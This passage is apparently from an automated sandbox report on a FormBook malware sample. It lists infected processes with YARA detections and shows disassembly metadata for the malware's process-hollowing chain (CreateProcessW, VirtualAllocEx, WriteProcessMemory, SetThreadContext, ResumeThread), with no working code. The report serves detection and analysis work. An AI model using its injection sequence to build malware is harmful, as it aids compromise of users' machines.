                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.401776618.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.401776618.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:7
                                                                                        Start time:09:36:22
                                                                                        Start date:14/05/2024
                                                                                        Path:C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exe"
                                                                                        Imagebase:0xb40000
                                                                                        File size:140'800 bytes
                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:8
                                                                                        Start time:09:36:25
                                                                                        Start date:14/05/2024
                                                                                        Path:C:\Windows\SysWOW64\dfrgui.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\dfrgui.exe"
                                                                                        Imagebase:0x4c0000
                                                                                        File size:586'752 bytes
                                                                                        MD5 hash:FB036244DBD2FADC225AD8650886B641
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.628678228.0000000000220000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.628678228.0000000000220000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.628640163.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.628640163.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.628611973.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.628611973.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:9
                                                                                        Start time:09:36:27
                                                                                        Start date:14/05/2024
                                                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                        Imagebase:0x400000
                                                                                        File size:543'304 bytes
                                                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:12
                                                                                        Start time:09:36:36
                                                                                        Start date:14/05/2024
                                                                                        Path:C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exe"
                                                                                        Imagebase:0xb40000
                                                                                        File size:140'800 bytes
                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.628854731.00000000009D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.628854731.00000000009D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:14
                                                                                        Start time:09:37:01
                                                                                        Start date:14/05/2024
                                                                                        Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                                                                                        Imagebase:0x1100000
                                                                                        File size:517'064 bytes
                                                                                        MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.477556208.0000000000270000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.477556208.0000000000270000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:17.5%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:31.9%
                                                                                          Total number of Nodes:47
                                                                                          Total number of Limit Nodes:1
                                                                                          execution_graph 3097 513c98 3098 513cb2 3097->3098 3099 513d02 3098->3099 3101 513d48 3098->3101 3102 513d8b 3101->3102 3124 513a84 3102->3124 3128 513a88 3102->3128 3103 514259 3104 5142cc 3103->3104 3116 513a84 VirtualAllocEx 3103->3116 3117 513a88 VirtualAllocEx 3103->3117 3132 513930 3104->3132 3136 51392c 3104->3136 3105 514538 3114 513930 WriteProcessMemory 3105->3114 3115 51392c WriteProcessMemory 3105->3115 3106 51433d 3106->3105 3110 513930 WriteProcessMemory 3106->3110 3111 51392c WriteProcessMemory 3106->3111 3107 514576 3108 51465e 3107->3108 3140 513800 3107->3140 3144 513808 3107->3144 3148 513ba8 3108->3148 3152 513ba0 3108->3152 3109 51471b 3109->3098 3110->3106 3111->3106 3114->3107 3115->3107 3116->3104 3117->3104 3125 513a88 VirtualAllocEx 3124->3125 3127 513b44 3125->3127 3127->3103 3129 513acc VirtualAllocEx 3128->3129 3131 513b44 3129->3131 3131->3103 3133 51397c WriteProcessMemory 3132->3133 3135 513a15 3133->3135 3135->3106 3137 513930 WriteProcessMemory 3136->3137 3139 513a15 3137->3139 3139->3106 3141 513808 Wow64SetThreadContext 3140->3141 3143 5138c9 3141->3143 3143->3108 3145 513851 Wow64SetThreadContext 3144->3145 3147 5138c9 3145->3147 3147->3108 3149 513bec ResumeThread 3148->3149 3151 513c38 3149->3151 3151->3109 3153 513bec ResumeThread 3152->3153 3155 513c38 3153->3155 3155->3109 3156 514cb8 ReadProcessMemory 3157 514d77 3156->3157 3158 514888 3159 514915 CreateProcessW 3158->3159 3161 514a6e 3159->3161 3161->3161

                                                                                          Executed Functions

                                                                                          Function 00513D48 Relevance: 1.9, Strings: 1, Instructions: 621COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 15 513d48-513d89 16 513d90-513f16 15->16 17 513d8b 15->17 24 513f18-513f3c 16->24 25 513f3d-513f82 call 512dfc 16->25 17->16 24->25 29 513f84-513fa0 25->29 30 513fab-514015 25->30 29->30 36 514017 30->36 37 51401c-514048 30->37 36->37 39 5140a9-5140db call 512e14 37->39 40 51404a-51407c call 512e08 37->40 45 514104 39->45 46 5140dd-5140f9 39->46 47 5140a5-5140a7 40->47 48 51407e-51409a 40->48 49 514105-51410f 45->49 46->45 47->49 48->47 51 514111 49->51 52 514116-51415c call 512e20 49->52 51->52 58 514185-51419e 52->58 59 51415e-51417a 52->59 60 5141a0-5141cc call 512e2c 58->60 61 5141f6-514254 58->61 59->58 67 5141f5 60->67 68 5141ce-5141ea 60->68 149 514257 call 513a84 61->149 150 514257 call 513a88 61->150 67->61 68->67 71 514259-51426e 73 514270-514281 71->73 74 514283-514285 71->74 75 51428b-51429f 73->75 74->75 76 5142a1-5142c7 75->76 77 5142dc-5142f3 75->77 143 5142ca call 513a84 76->143 144 5142ca call 513a88 76->144 78 5142f5-514311 77->78 79 51431c-514338 77->79 78->79 145 51433b call 513930 79->145 146 51433b call 51392c 79->146 80 5142cc-5142db 80->77 82 51433d-51435d 83 514386-5143bb 82->83 84 51435f-51437b 82->84 88 514513-514532 83->88 84->83 89 5143c0-514444 88->89 90 514538-514571 88->90 101 514508-51450d 89->101 102 51444a-5144b9 89->102 141 514574 call 513930 90->141 142 514574 call 51392c 90->142 95 514576-514596 96 514598-5145b4 95->96 97 5145bf-5145f2 95->97 96->97 103 5145f4-5145fb 97->103 104 5145fc-51460f 97->104 101->88 137 5144bc call 513930 102->137 138 5144bc call 51392c 102->138 103->104 106 514611 104->106 107 514616-514641 104->107 106->107 111 514643-514659 107->111 112 5146ab-5146dd call 512e38 107->112 139 51465c call 513800 111->139 140 51465c call 513808 111->140 121 514706 112->121 122 5146df-5146fb 112->122 113 5144be-5144de 116 5144e0-5144fc 113->116 117 514507 113->117 115 51465e-51467e 119 514680-51469c 115->119 120 5146a7-5146a9 115->120 116->117 117->101 119->120 124 514707-514716 120->124 121->124 122->121 147 514719 call 513ba0 124->147 148 514719 call 513ba8 124->148 128 51471b-51473b 131 514764-51486d 128->131 132 51473d-514759 128->132 132->131 137->113 138->113 139->115 140->115 141->95 142->95 143->80 144->80 145->82 146->82 147->128 148->128 149->71 150->71
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.354329047.0000000000510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_510000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (
                                                                                          • API String ID: 0-3887548279
                                                                                          • Opcode ID: e7cb0a56b57d6a86ef7a1c2a8b3865d6d284ff2ebc5e12b47162b3d5a72fcdfb
                                                                                          • Instruction ID: 8686be7eb0b746104baaf1ff79e266a05e65102a4682d2eef96027c635caa3c0
                                                                                          • Opcode Fuzzy Hash: e7cb0a56b57d6a86ef7a1c2a8b3865d6d284ff2ebc5e12b47162b3d5a72fcdfb
                                                                                          • Instruction Fuzzy Hash: 5052B074D012288FEB64DF65C994BEDBBB2BF89300F1485EA9409A7295DB346EC5CF40
                                                                                          Function 0051487D Relevance: 1.7, APIs: 1, Instructions: 224processCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 151 51487d-514913 153 514915-514927 151->153 154 51492a-514938 151->154 153->154 155 51493a-51494c 154->155 156 51494f-51498b 154->156 155->156 157 51498d-51499c 156->157 158 51499f-514a6c CreateProcessW 156->158 157->158 162 514a75-514b34 158->162 163 514a6e-514a74 158->163 173 514b36-514b5f 162->173 174 514b6a-514b75 162->174 163->162 173->174 177 514b76 174->177 177->177
                                                                                          APIs
                                                                                          • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00514A59
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.354329047.0000000000510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_510000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: a0d33f283a786ee8a1f6a2b41c57653b42cfa980a54b0f564717c6dd40fe453a
                                                                                          • Instruction ID: 25fe53dab2d03ae1dc128253d72ff89f20dedf15dc4d041992230377dfa85588
                                                                                          • Opcode Fuzzy Hash: a0d33f283a786ee8a1f6a2b41c57653b42cfa980a54b0f564717c6dd40fe453a
                                                                                          • Instruction Fuzzy Hash: E581C0B4D00229DFEB24DFA5C880BDDBBB5BF49300F1091AAE559B7260DB349A85CF54
                                                                                          Function 00514888 Relevance: 1.7, APIs: 1, Instructions: 220processCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 179 514888-514913 180 514915-514927 179->180 181 51492a-514938 179->181 180->181 182 51493a-51494c 181->182 183 51494f-51498b 181->183 182->183 184 51498d-51499c 183->184 185 51499f-514a6c CreateProcessW 183->185 184->185 189 514a75-514b34 185->189 190 514a6e-514a74 185->190 200 514b36-514b5f 189->200 201 514b6a-514b75 189->201 190->189 200->201 204 514b76 201->204 204->204
                                                                                          APIs
                                                                                          • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00514A59
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.354329047.0000000000510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_510000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: 81f3359c6fc0c67a35a743c4426e4ecfd680a536abc07d7e6202ffc36852439f
                                                                                          • Instruction ID: 0855eb13e898c0f7c87a9135f12e289f82d9ec914cdf23c461f6624a8105434e
                                                                                          • Opcode Fuzzy Hash: 81f3359c6fc0c67a35a743c4426e4ecfd680a536abc07d7e6202ffc36852439f
                                                                                          • Instruction Fuzzy Hash: C681C1B4D00229DFEB20DFA5C880BDDBBB5BF49300F1091AAE549B7260DB309A85CF54
                                                                                          Function 0051392C Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 206 51392c-51399b 209 5139b2-513a13 WriteProcessMemory 206->209 210 51399d-5139af 206->210 212 513a15-513a1b 209->212 213 513a1c-513a6e 209->213 210->209 212->213
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00513A03
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.354329047.0000000000510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_510000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: a6170080cec35d155a6a01feef7584c6c3f05c1406c020568e123921947dff4a
                                                                                          • Instruction ID: 266a35f6afe2d8d2de8f9a0d1e3edb53329b68e81f7c0cc382a10ad06eaca6cc
                                                                                          • Opcode Fuzzy Hash: a6170080cec35d155a6a01feef7584c6c3f05c1406c020568e123921947dff4a
                                                                                          • Instruction Fuzzy Hash: 2C41A9B5D012489FDF00DFA9D984AEEFBF1BF49310F20902AE814B7250C734AA45CB54
                                                                                          Function 00513930 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 218 513930-51399b 220 5139b2-513a13 WriteProcessMemory 218->220 221 51399d-5139af 218->221 223 513a15-513a1b 220->223 224 513a1c-513a6e 220->224 221->220 223->224
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00513A03
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.354329047.0000000000510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_510000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: cec60c466f1e5794b569cdc90fa46c25bbc02db8d33e8b1d0cb57a82157c7da2
                                                                                          • Instruction ID: 0901052c253cd24a4b88c4a428f28ed652708d33c24b6a65f08c4092e4851ad7
                                                                                          • Opcode Fuzzy Hash: cec60c466f1e5794b569cdc90fa46c25bbc02db8d33e8b1d0cb57a82157c7da2
                                                                                          • Instruction Fuzzy Hash: A0419AB4D012589FDF00DFA9D984AEEFBF1BF49310F20942AE814B7250D774AA45CB54
                                                                                          Function 00514CB0 Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 229 514cb0-514d75 ReadProcessMemory 231 514d77-514d7d 229->231 232 514d7e-514dbc 229->232 231->232
                                                                                          APIs
                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00514D65
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.354329047.0000000000510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_510000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessRead
                                                                                          • String ID:
                                                                                          • API String ID: 1726664587-0
                                                                                          • Opcode ID: 8c4bd846debabd532265fbfeaf54a048dccb6027e65481962f81999a99a27e86
                                                                                          • Instruction ID: 630a2e6797b89069cb11d0e2a15ddcd8dd7397f01d0725670f2bac3e38454812
                                                                                          • Opcode Fuzzy Hash: 8c4bd846debabd532265fbfeaf54a048dccb6027e65481962f81999a99a27e86
                                                                                          • Instruction Fuzzy Hash: 2F4179B9D04258DFCF10CFAAD984ADEFBB5BB49310F24A02AE814B7210D335A945CF65
                                                                                          Function 00513A84 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 235 513a84-513b42 VirtualAllocEx 239 513b44-513b4a 235->239 240 513b4b-513b95 235->240 239->240
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00513B32
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.354329047.0000000000510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_510000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: f68b18493839eac5a2b3e8d4bae9f8a4d11c75a409315d7090c21a2d9a99c149
                                                                                          • Instruction ID: 6b5fc39cedc4858c1fb3d862371106d5822a9d849aea8e66f6b6a75deaac644a
                                                                                          • Opcode Fuzzy Hash: f68b18493839eac5a2b3e8d4bae9f8a4d11c75a409315d7090c21a2d9a99c149
                                                                                          • Instruction Fuzzy Hash: 473197B8D00258DFCF00DFA9D884ADEFBB1BB49310F20942AE814BB210D735AA45CF55
                                                                                          Function 00513A88 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 245 513a88-513b42 VirtualAllocEx 248 513b44-513b4a 245->248 249 513b4b-513b95 245->249 248->249
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00513B32
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.354329047.0000000000510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_510000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 37eb1f42d23a50b1f9bb24f8ff410b907d8a7847f058db8d323f2626ecd82b42
                                                                                          • Instruction ID: 26bf9633bd4870c7a38e6929736bfe09390688ec0fd73c8ad924d77cf658715e
                                                                                          • Opcode Fuzzy Hash: 37eb1f42d23a50b1f9bb24f8ff410b907d8a7847f058db8d323f2626ecd82b42
                                                                                          • Instruction Fuzzy Hash: D531A8B8D002589FCF00DFA9D884ADEFBB1BB49310F20942AE814B7310D735AA45CF55
                                                                                          Function 00514CB8 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 254 514cb8-514d75 ReadProcessMemory 255 514d77-514d7d 254->255 256 514d7e-514dbc 254->256 255->256
                                                                                          APIs
                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00514D65
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.354329047.0000000000510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_510000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessRead
                                                                                          • String ID:
                                                                                          • API String ID: 1726664587-0
                                                                                          • Opcode ID: 9df97dcac54d9332df43061c6d27a636ab75b3262d53f5333fe92eccb7c171b0
                                                                                          • Instruction ID: 8248c4f16b53455c8d3ea3dd6516376ddf70af37c6007371e7a08a1913193807
                                                                                          • Opcode Fuzzy Hash: 9df97dcac54d9332df43061c6d27a636ab75b3262d53f5333fe92eccb7c171b0
                                                                                          • Instruction Fuzzy Hash: 983169B9D042589FCF10CFA9D984ADEFBB5BB49310F14A02AE814B7210D375A945CF65
                                                                                          Function 00513800 Relevance: 1.6, APIs: 1, Instructions: 99threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 259 513800-513868 262 51386a-51387c 259->262 263 51387f-5138c7 Wow64SetThreadContext 259->263 262->263 265 5138d0-51391c 263->265 266 5138c9-5138cf 263->266 266->265
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 005138B7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.354329047.0000000000510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_510000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: 719948240a40f678b057ddc0505373ed4cd606989ce3fed686c6b214a9bd0e87
                                                                                          • Instruction ID: 2eb6b34bdaf9613503a24651398eb56778368bfa856d0ab04acc172896b4013c
                                                                                          • Opcode Fuzzy Hash: 719948240a40f678b057ddc0505373ed4cd606989ce3fed686c6b214a9bd0e87
                                                                                          • Instruction Fuzzy Hash: 4741CFB4D012189FDB00DFA9D584ADEBFF1BF49310F24802AE414B7250C738AA49CF54
                                                                                          Function 00513808 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 271 513808-513868 273 51386a-51387c 271->273 274 51387f-5138c7 Wow64SetThreadContext 271->274 273->274 276 5138d0-51391c 274->276 277 5138c9-5138cf 274->277 277->276
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 005138B7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.354329047.0000000000510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_510000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: 4928eda00b628ff12118882d8bc236c6f2033eef83cb2fd65b6d8b4dd49916a7
                                                                                          • Instruction ID: e7c4a6b667c2ad5febbe3166d58da9a55f2569a6377546691b835718b29eaa12
                                                                                          • Opcode Fuzzy Hash: 4928eda00b628ff12118882d8bc236c6f2033eef83cb2fd65b6d8b4dd49916a7
                                                                                          • Instruction Fuzzy Hash: B6319EB4D012589FDB10DFA9D484AEEFFF1BB49314F24842AE414B7240D778AA45CF54
                                                                                          Function 00513BA0 Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 282 513ba0-513c36 ResumeThread 285 513c38-513c3e 282->285 286 513c3f-513c81 282->286 285->286
                                                                                          APIs
                                                                                          • ResumeThread.KERNELBASE(?), ref: 00513C26
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.354329047.0000000000510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_510000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: ad8d14b83535912c9821d14bb437ac1295cbdea4fa35b1cfa1dfdd452e4df70e
                                                                                          • Instruction ID: c857e02eed9c550884ea25c6d8ebd78c4e2fdfd8ec5fd2d8e919aa35f3d74d53
                                                                                          • Opcode Fuzzy Hash: ad8d14b83535912c9821d14bb437ac1295cbdea4fa35b1cfa1dfdd452e4df70e
                                                                                          • Instruction Fuzzy Hash: C931CDB4D002189FDB14DFA9D984ADEFBB4BF49324F10942AE814B7350C735A945CF95
                                                                                          Function 00513BA8 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 291 513ba8-513c36 ResumeThread 294 513c38-513c3e 291->294 295 513c3f-513c81 291->295 294->295
                                                                                          APIs
                                                                                          • ResumeThread.KERNELBASE(?), ref: 00513C26
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.354329047.0000000000510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_510000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: f69b02766be75f99d0fb97638152d23610c08036279a666137332d59dcafefc4
                                                                                          • Instruction ID: ac66c935dd51e0b7d1c1e3912ea8df4a268a77ce29c850731934269747142a64
                                                                                          • Opcode Fuzzy Hash: f69b02766be75f99d0fb97638152d23610c08036279a666137332d59dcafefc4
                                                                                          • Instruction Fuzzy Hash: 8E31ACB4D012189FDB14DFA9D984AEEFBB5BF89314F20942AE814B7300C735AA45CF95
                                                                                          Function 002BD4CC Relevance: .1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.352991123.00000000002BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002BD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2bd000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 02349a85840375ca17a3c9cd64917e2d1239a9bbeffc25377466f41415e62563
                                                                                          • Instruction ID: fb6d12d3309ecf3ca512210488b4c1dbcd8ff854ad31a623e6a60e277112d0cc
                                                                                          • Opcode Fuzzy Hash: 02349a85840375ca17a3c9cd64917e2d1239a9bbeffc25377466f41415e62563
                                                                                          • Instruction Fuzzy Hash: 072145B1524240DFEB25DF14D8C0BA6BF61FB94358F70C568D8050B246D336D966CBA1
                                                                                          Function 002BD4C7 Relevance: .1, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
